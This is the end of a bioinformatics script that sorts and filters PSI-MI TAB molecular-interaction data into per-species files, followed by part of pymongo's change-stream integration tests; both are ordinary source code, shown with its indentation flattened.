open(self.output_dir + 'alliance_molecular_interactions_sarscov2.tsv', 'w', encoding='utf-8') as sarscov2_out, \
open(self.output_dir + 'alliance_molecular_interactions_fly.tsv', 'w', encoding='utf-8') as fb_out, \
open(self.output_dir + 'alliance_molecular_interactions_worm.tsv', 'w', encoding='utf-8') as wb_out, \
open(self.output_dir + 'alliance_molecular_interactions_zebrafish.tsv', 'w', encoding='utf-8') as zfin_out, \
open(self.output_dir + 'alliance_molecular_interactions_yeast.tsv', 'w', encoding='utf-8') as sgd_out, \
open(self.output_dir + 'alliance_molecular_interactions_rat.tsv', 'w', encoding='utf-8') as rgd_out, \
open(self.output_dir + 'alliance_molecular_interactions_mouse.tsv', 'w', encoding='utf-8') as mgi_out, \
open(self.output_dir + 'alliance_molecular_interactions_human.tsv', 'w', encoding='utf-8') as human_out, \
open(self.output_dir + 'molecular_interactions_skipped_entries.txt', 'w', encoding='utf-8') as skipped_out, \
open(self.output_dir + 'molecular_interactions_mapped_entries.txt', 'a+', encoding='utf-8') as mapped_out:
mapped_out = csv.writer(mapped_out, quotechar = '', quoting=csv.QUOTE_NONE, delimiter='\t')
tsvout = csv.writer(tsvout, quotechar = '', quoting=csv.QUOTE_NONE, delimiter='\t')
skipped_out = csv.writer(skipped_out, quotechar = '', quoting=csv.QUOTE_NONE, delimiter='\t')
sarscov2_out = csv.writer(sarscov2_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
fb_out = csv.writer(fb_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
wb_out = csv.writer(wb_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
zfin_out = csv.writer(zfin_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
sgd_out = csv.writer(sgd_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
rgd_out = csv.writer(rgd_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
mgi_out = csv.writer(mgi_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
human_out = csv.writer(human_out, quotechar='', quoting=csv.QUOTE_NONE, delimiter='\t')
# This list is now sorted phylogenetically for the header to be sorted
out_write_list = [human_out, rgd_out, mgi_out, zfin_out, fb_out, wb_out, sgd_out, sarscov2_out]
taxon_file_dispatch_dict = {
'taxid:10116': rgd_out,
'taxid:9606': human_out,
'taxid:10090': mgi_out,
'taxid:6239': wb_out,
'taxid:559292': sgd_out,
'taxid:7955': zfin_out,
'taxid:7227': fb_out,
'taxid:2697049': sarscov2_out,
'taxid:4932': sgd_out,
'taxid:307796': sgd_out,
'taxid:643680': sgd_out,
'taxid:574961': sgd_out,
'taxid:285006': sgd_out,
'taxid:545124': sgd_out,
'taxid:764097': sgd_out
}
out_to_species_name_dict = {
rgd_out: 'Rattus norvegicus',
human_out: 'Homo sapiens',
mgi_out: 'Mus musculus',
wb_out: 'Caenorhabditis elegans',
sgd_out: 'Saccharomyces cerevisiae',
zfin_out: 'Danio rerio',
sarscov2_out: 'Severe acute respiratory syndrome coronavirus 2',
fb_out: 'Drosophila melanogaster'
}
out_to_header_taxonid_dict = {
rgd_out: 'NCBI:txid10116',
human_out: 'NCBI:txid9606',
mgi_out: 'NCBI:txid10090',
wb_out: 'NCBI:txid6239',
sgd_out: 'NCBI:txid559292',
zfin_out: 'NCBI:txid7955',
sarscov2_out: 'NCBI:txid2697049',
fb_out: 'NCBI:txid7227'
}
# Write the comments in the main file.
filetype = 'Molecular Interactions'
data_format = 'PSI-MI TAB 2.7 Format'
database_version = self.context_info.env["ALLIANCE_RELEASE"]
species_list = []
taxon_list = []
for entry in out_write_list:
taxon_list.append(out_to_header_taxonid_dict[entry])
species_list.append(out_to_species_name_dict[entry])
species = ", ".join(species_list)
taxon_ids = ", ".join(taxon_list)
taxon_ids = '# TaxonIDs: {}'.format(taxon_ids)
gen_time = datetime.utcnow().strftime("%Y-%m-%d %H:%M")
readme = 'https://github.com/HUPO-PSI/miTab/blob/master/PSI-MITAB27Format.md'
response = urllib.request.urlopen(self.context_info.env["HEADER_TEMPLATE_URL"])
header_template = HeaderTemplate(response.read().decode('ascii'))
header_dict = {'filetype': filetype, 'data_format': data_format, 'stringency_filter': '',
'taxon_ids': taxon_ids, 'database_version': database_version, 'species': species,
'gen_time': gen_time, 'readme': readme}
header = header_template.substitute(header_dict)
header_rows = [line.strip() for line in header.splitlines() if len(line.strip()) != 0]
for header_row in header_rows:
tsvout.writerow([header_row])
tsvout.writerow(psi_mi_tab_header)
for entry in out_write_list:
filetype = 'Molecular Interactions'
species = out_to_species_name_dict[entry]
taxon_ids = '# TaxonIDs: {}'.format(out_to_header_taxonid_dict[entry])
header_dict = {'filetype': filetype, 'data_format': data_format, 'stringency_filter': '',
'taxon_ids': taxon_ids, 'database_version': database_version, 'species': species,
'gen_time': gen_time, 'readme': readme}
header = header_template.substitute(header_dict)
header_rows = [line.strip() for line in header.splitlines() if len(line.strip()) != 0]
for header_row in header_rows:
entry.writerow([header_row])
entry.writerow(psi_mi_tab_header)
psi_mi_tab_header.insert(0,'Reason for skipping row.')
skipped_out.writerow(psi_mi_tab_header)
# The order of this list is important! Defined in the list above. Cannot be parallelized
for filename in parsing_list:
logger.info('Parsing file: %s' % (filename))
filename_type = None
if filename == imex_filename:
filename_type = 'imex'
elif filename == biogrid_filename:
filename_type = 'biogrid'
elif filename == flybase_filename:
filename_type = 'flybase'
elif filename == wormbase_filename:
filename_type = 'wormbase'
# Declare the tracking dict used to look for duplicates. It tracks sets.
publication_tracking_dict[filename_type] = set()
with open(filename, 'r', encoding='utf-8') as tsvin:
csv_reader = csv.reader(tsvin, delimiter='\t', quoting=csv.QUOTE_NONE)
# for local runs, to see progress
# for row in tqdm(csv_reader):
for row in csv_reader:
if row[0].startswith("#"):
row.insert(0,'Entry starts with # commented out or header')
skipped_out.writerow(row)
continue
if row[8] == '-':
row.insert(0,'Column 9 is blank, no publication')
skipped_out.writerow(row)
continue
if filename_type == 'biogrid':
if row[11] in rejected_col12:
row.insert(0,'col12 does not have an approved value: {}.'.format(row[11]))
skipped_out.writerow(row)
continue
if row[6] in rejected_col7:
row.insert(0,'col7 does not have an approved value: {}.'.format(row[6]))
skipped_out.writerow(row)
continue
biogrid_interaction_id = re.findall(r'\d+', row[13])[0]
if biogrid_interaction_id in self.biogrid_genetic_set:
row.insert(0,'biogrid_interaction_id genetic in tab 3.0: {}.'.format(biogrid_interaction_id))
skipped_out.writerow(row)
continue
# We need to add '-' characters to columns 17-42 for biogrid entries.
for _ in range(17,43):
row.append('-')
# Reassigning values in several columns as described above.
row[18] = 'psi-mi:\"MI:0496\"(bait)'
row[19] = 'psi-mi:\"MI:0498\"(prey)'
row[20] = 'psi-mi:\"MI:0326\"(protein)'
row[21] = 'psi-mi:\"MI:0326\"(protein)'
if biogrid_interaction_id in self.biogrid_rna_set:
row[21] = 'psi-mi:\"MI:0320\"(ribonucleic acid)'
row[35] = 'false'
try:
taxon_id_1 = re.search(r'taxid:\d+', row[9]).group(0)
except AttributeError:
row.insert(0,'Taxon ID appears to be missing for interactor A from column 10: %s' % row[9])
skipped_out.writerow(row)
continue # Skip rows where we don't find a taxon entry.
try:
taxon_id_2 = re.search(r'taxid:\d+', row[10]).group(0)
except AttributeError:
row.insert(0,'Taxon ID appears to be missing for interactor B from column 11: %s' % row[10])
skipped_out.writerow(row)
continue # Skip rows where we don't find a taxon entry.
if taxon_id_1 not in taxon_species_set or taxon_id_2 not in taxon_species_set:
row.insert(0,'Not in Alliance taxon list.')
skipped_out.writerow(row)
continue # Skip rows where we don't have Alliance species or a blank entry.
if taxon_id_1 in possible_yeast_taxon_set: # Change yeast taxon ids to the preferred 'taxid:559292'
row[9] = 'taxid:559292(Saccharomyces cerevisiae)'
if taxon_id_2 in possible_yeast_taxon_set: # Change yeast taxon ids to the preferred 'taxid:559292'
row[10] = 'taxid:559292(Saccharomyces cerevisiae)'
row_initial = list(row) # Create a true copy of the list. Used for validation later.
# Skip rows with MI:0208 "genetic interaction".
if row[11].startswith(interaction_exclusion_set):
row.insert(0,'Contains a term from the interaction exclusion set.')
skipped_out.writerow(row)
continue
# Skip rows with undesired interaction types.
# Sometimes these columns don't exist in BIOGRID? IndexErrors still write the proper message and skip the entry.
if filename_type != 'biogrid': # Biogrid stops at row 16.
try:
if row[20].startswith(interactor_type_exclusion_set):
row.insert(0,'Contains a term from the interactor type exclusion set.')
skipped_out.writerow(row)
continue
except IndexError:
row.insert(0,'Interactor type column not found? Skipping entry.')
skipped_out.writerow(row)
continue
try:
if row[21].startswith(interactor_type_exclusion_set):
row.insert(0,'Contains a term from the interactor type exclusion set.')
skipped_out.writerow(row)
continue
except IndexError:
row.insert(0,'Interactor type column not found? Skipping entry.')
skipped_out.writerow(row)
continue
# Skip entries which have 'Expansion method(s)'.
if row[15] != '-':
row.insert(0,'Contains an expansion method.')
skipped_out.writerow(row)
continue
interactor_A_resolved, interactor_B_resolved, row = self.resolve_identifiers_by_row(row, mapped_out)
if interactor_A_resolved is False and interactor_B_resolved is True:
row.insert(0,'Can\'t resolve interactor A identifier, alias, alternate id, or xref against the list of known Alliance identifiers.')
skipped_out.writerow(row)
continue
elif interactor_A_resolved is True and interactor_B_resolved is False:
row.insert(0,'Can\'t resolve interactor B identifier, alias, alternate id, or xref against the list of known Alliance identifiers.')
skipped_out.writerow(row)
continue
elif interactor_A_resolved is False and interactor_B_resolved is False:
row.insert(0,'Can\'t resolve either interactor A or B identifier, alias, alternate id, or xref against the list of known Alliance identifiers.')
skipped_out.writerow(row)
continue
# Grab the publication information
# Also creating a tuple "key" to use for filtering purposes.
if row[8] is not None:
pubmed_unassigned = re.search(r'pubmed:unassigned', row[8])
if pubmed_unassigned is not None:
row.insert(0,'Pubmed value is unassigned')
skipped_out.writerow(row)
continue
publication_re = re.search(r'pubmed:\d+', row[8])
if publication_re is not None:
publication = publication_re.group(0)
if publication.startswith('pubmed:88880000'):
biogrid_key = row[13]
if biogrid_key in self.biogrid_doi_dict:
publication = self.biogrid_doi_dict[biogrid_key]
row[8] = self.biogrid_doi_dict[biogrid_key]
else:
row.insert(0,'Column 9 has pubmed:88880000 but biogrid_key %s does not have valid mapping in biogrid-tab3 file' % (biogrid_key))
skipped_out.writerow(row)
continue
# Capture everything up to the first parenthesis in the taxon column.
taxon1 = re.search(r'taxid:\d+', row[9]).group(0)
taxon2 = re.search(r'taxid:\d+', row[10]).group(0)
# Build a filtering key from the publication, taxon1, and taxon2.
tracking_tuple = (publication, taxon1, taxon2)
exit_tsv_loop = False
for key, value in publication_tracking_dict.items():
if key != filename_type: # Don't look in our current dictionary.
if tracking_tuple in value:
row.insert(0,'Already added this interaction to the export file from %s. Filter criteria: %s' % (key, (tracking_tuple,)))
skipped_out.writerow(row)
exit_tsv_loop = True
if exit_tsv_loop:
continue
# If we loop through all the possible sets and don't continue, add the tuple.
publication_tracking_dict[filename_type].add(tracking_tuple)
if filename_type != 'biogrid' and len(row) != len(row_initial):
print('FATAL ERROR: The row length was changed during processing.')
print(row_initial)
print(row)
quit()
# Write the row to all the appropriate files.
tsvout.writerow(row)
taxon1 = re.search(r'taxid:\d+', row[9]).group(0)
taxon2 = re.search(r'taxid:\d+', row[10]).group(0)
self.wrote_to_file_already = False
if taxon1 == taxon2:
try:
taxon_file_dispatch_dict[taxon1].writerow(row)
except KeyError:
pass
else:
try:
taxon_file_dispatch_dict[taxon1].writerow(row)
except KeyError:
pass
try:
taxon_file_dispatch_dict[taxon2].writerow(row)
except KeyError:
pass
def validate_and_upload_files_to_fms(self):
logger.info('Summary of files created:')
logger.info(os.system("ls -alh {}*".format(self.output_dir)))
upload_location_dict = {
'alliance_molecular_interactions.tsv': 'COMBINED',
'alliance_molecular_interactions_fly.tsv': 'FB',
'alliance_molecular_interactions_sarscov2.tsv': 'SARS-CoV-2',
'alliance_molecular_interactions_worm.tsv': 'WB',
'alliance_molecular_interactions_zebrafish.tsv': 'ZFIN',
'alliance_molecular_interactions_yeast.tsv': 'SGD',
'alliance_molecular_interactions_rat.tsv': 'RGD',
'alliance_molecular_interactions_mouse.tsv': 'MGI',
'alliance_molecular_interactions_human.tsv': 'HUMAN'
}
thread_pool = []
for filename in upload_location_dict.keys():
dataSubType = upload_location_dict[filename]
p = multiprocessing.Process(target=super().fms_upload, args=("INTERACTION-MOL", dataSubType, filename))
p.start()
thread_pool.append(p)
Processor.wait_for_threads(thread_pool)
|
test_change_stream.py
|
# Copyright 2017 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test the change_stream module."""
import random
import os
import re
import sys
import string
import threading
import time
import uuid
from contextlib import contextmanager
from itertools import product
sys.path[0:0] = ['']
from bson import BSON, ObjectId, SON, json_util
from bson.binary import (ALL_UUID_REPRESENTATIONS,
Binary,
STANDARD,
PYTHON_LEGACY)
from bson.py3compat import iteritems
from bson.raw_bson import DEFAULT_RAW_BSON_OPTIONS, RawBSONDocument
from pymongo.change_stream import _NON_RESUMABLE_GETMORE_ERRORS
from pymongo.command_cursor import CommandCursor
from pymongo.errors import (InvalidOperation, OperationFailure,
ServerSelectionTimeoutError)
from pymongo.message import _CursorAddress
from pymongo.read_concern import ReadConcern
from pymongo.write_concern import WriteConcern
from test import client_context, unittest, IntegrationTest
from test.utils import (
EventListener, WhiteListEventListener, rs_or_single_client
)
class ChangeStreamTryNextMixin(object):
def change_stream_with_client(self, client, *args, **kwargs):
raise NotImplementedError
def change_stream(self, *args, **kwargs):
return self.change_stream_with_client(self.client, *args, **kwargs)
def watched_collection(self):
"""Return a collection that is watched by self.change_stream()."""
raise NotImplementedError
def kill_change_stream_cursor(self, change_stream):
# Cause a cursor not found error on the next getMore.
cursor = change_stream._cursor
address = _CursorAddress(cursor.address, cursor._CommandCursor__ns)
client = self.watched_collection().database.client
client._close_cursor_now(cursor.cursor_id, address)
def test_try_next(self):
# ChangeStreams only read majority committed data so use w:majority.
coll = self.watched_collection().with_options(
write_concern=WriteConcern("majority"))
coll.drop()
coll.insert_one({})
self.addCleanup(coll.drop)
with self.change_stream(max_await_time_ms=250) as stream:
self.assertIsNone(stream.try_next())
self.assertIsNone(stream._resume_token)
coll.insert_one({})
change = stream.try_next()
self.assertEqual(change['_id'], stream._resume_token)
self.assertIsNone(stream.try_next())
self.assertEqual(change['_id'], stream._resume_token)
def test_try_next_runs_one_getmore(self):
listener = EventListener()
client = rs_or_single_client(event_listeners=[listener])
# Connect to the cluster.
client.admin.command('ping')
listener.results.clear()
# ChangeStreams only read majority committed data so use w:majority.
coll = self.watched_collection().with_options(
write_concern=WriteConcern("majority"))
coll.drop()
# Create the watched collection before starting the change stream to
# skip any "create" events.
coll.insert_one({'_id': 1})
self.addCleanup(coll.drop)
with self.change_stream_with_client(
client, max_await_time_ms=250) as stream:
self.assertEqual(listener.started_command_names(), ["aggregate"])
listener.results.clear()
# Confirm that only a single getMore is run even when no documents
# are returned.
self.assertIsNone(stream.try_next())
self.assertEqual(listener.started_command_names(), ["getMore"])
listener.results.clear()
self.assertIsNone(stream.try_next())
self.assertEqual(listener.started_command_names(), ["getMore"])
listener.results.clear()
# Get at least one change before resuming.
coll.insert_one({'_id': 2})
change = stream.try_next()
self.assertEqual(change['_id'], stream._resume_token)
listener.results.clear()
# Cause the next request to initiate the resume process.
self.kill_change_stream_cursor(stream)
listener.results.clear()
# The sequence should be:
# - getMore, fail
# - resume with aggregate command
# - no results, return immediately without another getMore
self.assertIsNone(stream.try_next())
self.assertEqual(
listener.started_command_names(), ["getMore", "aggregate"])
listener.results.clear()
# Stream still works after a resume.
coll.insert_one({'_id': 3})
change = stream.try_next()
self.assertEqual(change['_id'], stream._resume_token)
self.assertEqual(listener.started_command_names(), ["getMore"])
self.assertIsNone(stream.try_next())
class TestClusterChangeStream(IntegrationTest, ChangeStreamTryNextMixin):
@classmethod
@client_context.require_version_min(4, 0, 0, -1)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestClusterChangeStream, cls).setUpClass()
cls.dbs = [cls.db, cls.client.pymongo_test_2]
@classmethod
def tearDownClass(cls):
for db in cls.dbs:
cls.client.drop_database(db)
super(TestClusterChangeStream, cls).tearDownClass()
def change_stream_with_client(self, client, *args, **kwargs):
return client.watch(*args, **kwargs)
def watched_collection(self):
return self.db.test
def generate_unique_collnames(self, numcolls):
# Generate N collection names unique to a test.
collnames = []
for idx in range(1, numcolls + 1):
collnames.append(self.id() + '_' + str(idx))
return collnames
def insert_and_check(self, change_stream, db, collname, doc):
coll = db[collname]
coll.insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], {'db': db.name,
'coll': collname})
self.assertEqual(change['fullDocument'], doc)
def test_simple(self):
collnames = self.generate_unique_collnames(3)
with self.change_stream() as change_stream:
for db, collname in product(self.dbs, collnames):
self.insert_and_check(
change_stream, db, collname, {'_id': collname}
)
class TestDatabaseChangeStream(IntegrationTest, ChangeStreamTryNextMixin):
@classmethod
@client_context.require_version_min(4, 0, 0, -1)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestDatabaseChangeStream, cls).setUpClass()
def change_stream_with_client(self, client, *args, **kwargs):
return client[self.db.name].watch(*args, **kwargs)
def watched_collection(self):
return self.db.test
def generate_unique_collnames(self, numcolls):
# Generate N collection names unique to a test.
collnames = []
for idx in range(1, numcolls + 1):
collnames.append(self.id() + '_' + str(idx))
return collnames
def insert_and_check(self, change_stream, collname, doc):
coll = self.db[collname]
coll.insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], {'db': self.db.name,
'coll': collname})
self.assertEqual(change['fullDocument'], doc)
def test_simple(self):
collnames = self.generate_unique_collnames(3)
with self.change_stream() as change_stream:
for collname in collnames:
self.insert_and_check(
change_stream, collname, {'_id': uuid.uuid4()}
)
def test_isolation(self):
# Ensure inserts to other dbs don't show up in our ChangeStream.
other_db = self.client.pymongo_test_temp
self.assertNotEqual(
other_db, self.db, msg="Isolation must be tested on separate DBs"
)
collname = self.id()
with self.change_stream() as change_stream:
other_db[collname].insert_one({'_id': uuid.uuid4()})
self.insert_and_check(
change_stream, collname, {'_id': uuid.uuid4()}
)
self.client.drop_database(other_db)
class TestCollectionChangeStream(IntegrationTest, ChangeStreamTryNextMixin):
@classmethod
@client_context.require_version_min(3, 5, 11)
@client_context.require_no_mmap
@client_context.require_no_standalone
def setUpClass(cls):
super(TestCollectionChangeStream, cls).setUpClass()
cls.coll = cls.db.change_stream_test
# SERVER-31885 On a mongos the database must exist in order to create
# a changeStream cursor. However, WiredTiger drops the database when
# there are no more collections. Let's prevent that.
cls.db.prevent_implicit_database_deletion.insert_one({})
@classmethod
def tearDownClass(cls):
cls.db.prevent_implicit_database_deletion.drop()
super(TestCollectionChangeStream, cls).tearDownClass()
def setUp(self):
# Use a new collection for each test.
self.coll = self.db[self.id()]
def tearDown(self):
self.coll.drop()
def change_stream_with_client(self, client, *args, **kwargs):
return client[self.db.name].test.watch(*args, **kwargs)
def watched_collection(self):
return self.db.test
def insert_and_check(self, change_stream, doc):
self.coll.insert_one(doc)
change = next(change_stream)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], {'db': self.coll.database.name,
'coll': self.coll.name})
self.assertEqual(change['fullDocument'], doc)
def test_watch(self):
with self.coll.watch(
[{'$project': {'foo': 0}}], full_document='updateLookup',
max_await_time_ms=1000, batch_size=100) as change_stream:
self.assertEqual([{'$project': {'foo': 0}}],
change_stream._pipeline)
self.assertEqual('updateLookup', change_stream._full_document)
self.assertIsNone(change_stream._resume_token)
self.assertEqual(1000, change_stream._max_await_time_ms)
self.assertEqual(100, change_stream._batch_size)
self.assertIsInstance(change_stream._cursor, CommandCursor)
self.assertEqual(
1000, change_stream._cursor._CommandCursor__max_await_time_ms)
self.coll.insert_one({})
change = change_stream.next()
resume_token = change['_id']
with self.assertRaises(TypeError):
self.coll.watch(pipeline={})
with self.assertRaises(TypeError):
self.coll.watch(full_document={})
# No Error.
with self.coll.watch(resume_after=resume_token):
pass
def test_full_pipeline(self):
"""$changeStream must be the first stage in a change stream pipeline
sent to the server.
"""
listener = WhiteListEventListener("aggregate")
results = listener.results
client = rs_or_single_client(event_listeners=[listener])
self.addCleanup(client.close)
coll = client[self.db.name][self.coll.name]
with coll.watch([{'$project': {'foo': 0}}]) as _:
pass
self.assertEqual(1, len(results['started']))
command = results['started'][0]
self.assertEqual('aggregate', command.command_name)
self.assertEqual([
{'$changeStream': {'fullDocument': 'default'}},
{'$project': {'foo': 0}}],
command.command['pipeline'])
def test_iteration(self):
with self.coll.watch(batch_size=2) as change_stream:
num_inserted = 10
self.coll.insert_many([{} for _ in range(num_inserted)])
self.coll.drop()
inserts_received = 0
for change in change_stream:
if change['operationType'] not in ('drop', 'invalidate'):
self.assertEqual(change['operationType'], 'insert')
inserts_received += 1
self.assertEqual(num_inserted, inserts_received)
# Last change should be invalidate.
self.assertEqual(change['operationType'], 'invalidate')
with self.assertRaises(StopIteration):
change_stream.next()
with self.assertRaises(StopIteration):
next(change_stream)
def _test_next_blocks(self, change_stream):
inserted_doc = {'_id': ObjectId()}
changes = []
t = threading.Thread(
target=lambda: changes.append(change_stream.next()))
t.start()
# Sleep for a bit to prove that the call to next() blocks.
time.sleep(1)
self.assertTrue(t.is_alive())
self.assertFalse(changes)
self.coll.insert_one(inserted_doc)
# Join with large timeout to give the server time to return the change,
# in particular for sharded clusters.
t.join(30)
self.assertFalse(t.is_alive())
self.assertEqual(1, len(changes))
self.assertEqual(changes[0]['operationType'], 'insert')
self.assertEqual(changes[0]['fullDocument'], inserted_doc)
def test_next_blocks(self):
"""Test that next blocks until a change is readable"""
# Use a short await time to speed up the test.
with self.coll.watch(max_await_time_ms=250) as change_stream:
self._test_next_blocks(change_stream)
def test_aggregate_cursor_blocks(self):
"""Test that an aggregate cursor blocks until a change is readable."""
with self.coll.aggregate([{'$changeStream': {}}],
maxAwaitTimeMS=250) as change_stream:
self._test_next_blocks(change_stream)
def test_concurrent_close(self):
"""Ensure a ChangeStream can be closed from another thread."""
# Use a short await time to speed up the test.
with self.coll.watch(max_await_time_ms=250) as change_stream:
def iterate_cursor():
for _ in change_stream:
pass
t = threading.Thread(target=iterate_cursor)
t.start()
self.coll.insert_one({})
time.sleep(1)
change_stream.close()
t.join(3)
self.assertFalse(t.is_alive())
def test_update_resume_token(self):
"""ChangeStream must continuously track the last seen resumeToken."""
with self.coll.watch() as change_stream:
self.assertIsNone(change_stream._resume_token)
for _ in range(3):
self.coll.insert_one({})
change = next(change_stream)
self.assertEqual(change['_id'], change_stream._resume_token)
@client_context.require_no_mongos # PYTHON-1739
def test_raises_error_on_missing_id(self):
"""ChangeStream will raise an exception if the server response is
missing the resume token.
"""
with self.coll.watch([{'$project': {'_id': 0}}]) as change_stream:
self.coll.insert_one({})
# Server returns an error after SERVER-37786, otherwise pymongo
# raises an error.
with self.assertRaises((InvalidOperation, OperationFailure)):
next(change_stream)
# The cursor should now be closed.
with self.assertRaises(StopIteration):
next(change_stream)
def test_resume_on_error(self):
"""ChangeStream will automatically resume one time on a resumable
error (including not master) with the initial pipeline and options,
except for the addition/update of a resumeToken.
"""
with self.coll.watch([]) as change_stream:
self.insert_and_check(change_stream, {'_id': 1})
# Cause a cursor not found error on the next getMore.
self.kill_change_stream_cursor(change_stream)
self.insert_and_check(change_stream, {'_id': 2})
def test_does_not_resume_fatal_errors(self):
"""ChangeStream will not attempt to resume fatal server errors."""
for code in _NON_RESUMABLE_GETMORE_ERRORS:
with self.coll.watch() as change_stream:
self.coll.insert_one({})
def mock_try_next(*args, **kwargs):
change_stream._cursor.close()
raise OperationFailure('Mock server error', code=code)
original_try_next = change_stream._cursor._try_next
change_stream._cursor._try_next = mock_try_next
with self.assertRaises(OperationFailure):
next(change_stream)
change_stream._cursor._try_next = original_try_next
with self.assertRaises(StopIteration):
next(change_stream)
def test_initial_empty_batch(self):
"""Ensure that a cursor returned from an aggregate command with a
cursor id, and an initial empty batch, is not closed on the driver
side.
"""
with self.coll.watch() as change_stream:
# The first batch should be empty.
self.assertEqual(
0, len(change_stream._cursor._CommandCursor__data))
cursor_id = change_stream._cursor.cursor_id
self.assertTrue(cursor_id)
self.insert_and_check(change_stream, {})
# Make sure we're still using the same cursor.
self.assertEqual(cursor_id, change_stream._cursor.cursor_id)
def test_kill_cursors(self):
"""The killCursors command sent during the resume process must not be
allowed to raise an exception.
"""
def raise_error():
raise ServerSelectionTimeoutError('mock error')
with self.coll.watch([]) as change_stream:
self.insert_and_check(change_stream, {'_id': 1})
# Cause a cursor not found error on the next getMore.
cursor = change_stream._cursor
self.kill_change_stream_cursor(change_stream)
cursor.close = raise_error
self.insert_and_check(change_stream, {'_id': 2})
def test_unknown_full_document(self):
"""Must rely on the server to raise an error on unknown fullDocument.
"""
try:
with self.coll.watch(full_document='notValidatedByPyMongo'):
pass
except OperationFailure:
pass
def test_change_operations(self):
"""Test each operation type."""
expected_ns = {'db': self.coll.database.name, 'coll': self.coll.name}
with self.coll.watch() as change_stream:
# Insert.
inserted_doc = {'_id': ObjectId(), 'foo': 'bar'}
self.coll.insert_one(inserted_doc)
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns'], expected_ns)
self.assertEqual(change['fullDocument'], inserted_doc)
# Update.
update_spec = {'$set': {'new': 1}, '$unset': {'foo': 1}}
self.coll.update_one(inserted_doc, update_spec)
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'update')
self.assertEqual(change['ns'], expected_ns)
self.assertNotIn('fullDocument', change)
self.assertEqual({'updatedFields': {'new': 1},
'removedFields': ['foo']},
change['updateDescription'])
# Replace.
self.coll.replace_one({'new': 1}, {'foo': 'bar'})
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'replace')
self.assertEqual(change['ns'], expected_ns)
self.assertEqual(change['fullDocument'], inserted_doc)
# Delete.
self.coll.delete_one({'foo': 'bar'})
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'delete')
self.assertEqual(change['ns'], expected_ns)
self.assertNotIn('fullDocument', change)
# Invalidate.
self.coll.drop()
change = change_stream.next()
# 4.1 returns a "drop" change document.
if change['operationType'] == 'drop':
self.assertTrue(change['_id'])
self.assertEqual(change['ns'], expected_ns)
# Last change should be invalidate.
change = change_stream.next()
self.assertTrue(change['_id'])
self.assertEqual(change['operationType'], 'invalidate')
self.assertNotIn('ns', change)
self.assertNotIn('fullDocument', change)
# The ChangeStream should be dead.
with self.assertRaises(StopIteration):
change_stream.next()
def test_raw(self):
"""Test with RawBSONDocument."""
raw_coll = self.coll.with_options(
codec_options=DEFAULT_RAW_BSON_OPTIONS)
with raw_coll.watch() as change_stream:
raw_doc = RawBSONDocument(BSON.encode({'_id': 1}))
self.coll.insert_one(raw_doc)
change = next(change_stream)
self.assertIsInstance(change, RawBSONDocument)
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['ns']['db'], self.coll.database.name)
self.assertEqual(change['ns']['coll'], self.coll.name)
self.assertEqual(change['fullDocument'], raw_doc)
self.assertEqual(change['_id'], change_stream._resume_token)
def test_uuid_representations(self):
"""Test with uuid document _ids and different uuid_representation."""
for uuid_representation in ALL_UUID_REPRESENTATIONS:
for id_subtype in (STANDARD, PYTHON_LEGACY):
resume_token = None
options = self.coll.codec_options.with_options(
uuid_representation=uuid_representation)
coll = self.coll.with_options(codec_options=options)
with coll.watch() as change_stream:
coll.insert_one(
{'_id': Binary(uuid.uuid4().bytes, id_subtype)})
resume_token = change_stream.next()['_id']
# Should not error.
coll.watch(resume_after=resume_token)
def test_document_id_order(self):
"""Test with document _ids that need their order preserved."""
random_keys = random.sample(string.ascii_letters,
len(string.ascii_letters))
random_doc = {'_id': SON([(key, key) for key in random_keys])}
for document_class in (dict, SON, RawBSONDocument):
options = self.coll.codec_options.with_options(
document_class=document_class)
coll = self.coll.with_options(codec_options=options)
with coll.watch() as change_stream:
coll.insert_one(random_doc)
resume_token = change_stream.next()['_id']
# The resume token is always a document.
self.assertIsInstance(resume_token, document_class)
# Should not error.
coll.watch(resume_after=resume_token)
coll.delete_many({})
def test_read_concern(self):
"""Test readConcern is not validated by the driver."""
# Read concern 'local' is not allowed for $changeStream.
coll = self.coll.with_options(read_concern=ReadConcern('local'))
with self.assertRaises(OperationFailure):
coll.watch()
# Does not error.
coll = self.coll.with_options(read_concern=ReadConcern('majority'))
with coll.watch():
pass
def invalidate_resume_token(self):
with self.coll.watch(
[{'$match': {'operationType': 'invalidate'}}]) as cs:
self.coll.insert_one({'_id': 1})
self.coll.drop()
resume_token = cs.next()['_id']
self.assertFalse(cs.alive)
return resume_token
@client_context.require_version_min(4, 1, 1)
def test_start_after(self):
resume_token = self.invalidate_resume_token()
# resume_after cannot resume after invalidate.
with self.assertRaises(OperationFailure):
self.coll.watch(resume_after=resume_token)
# start_after can resume after invalidate.
with self.coll.watch(start_after=resume_token) as change_stream:
self.coll.insert_one({'_id': 2})
change = change_stream.next()
self.assertEqual(change['operationType'], 'insert')
self.assertEqual(change['fullDocument'], {'_id': 2})
@client_context.require_version_min(4, 1, 1)
def test_start_after_resume_process_with_changes(self):
resume_token = self.invalidate_resume_token()
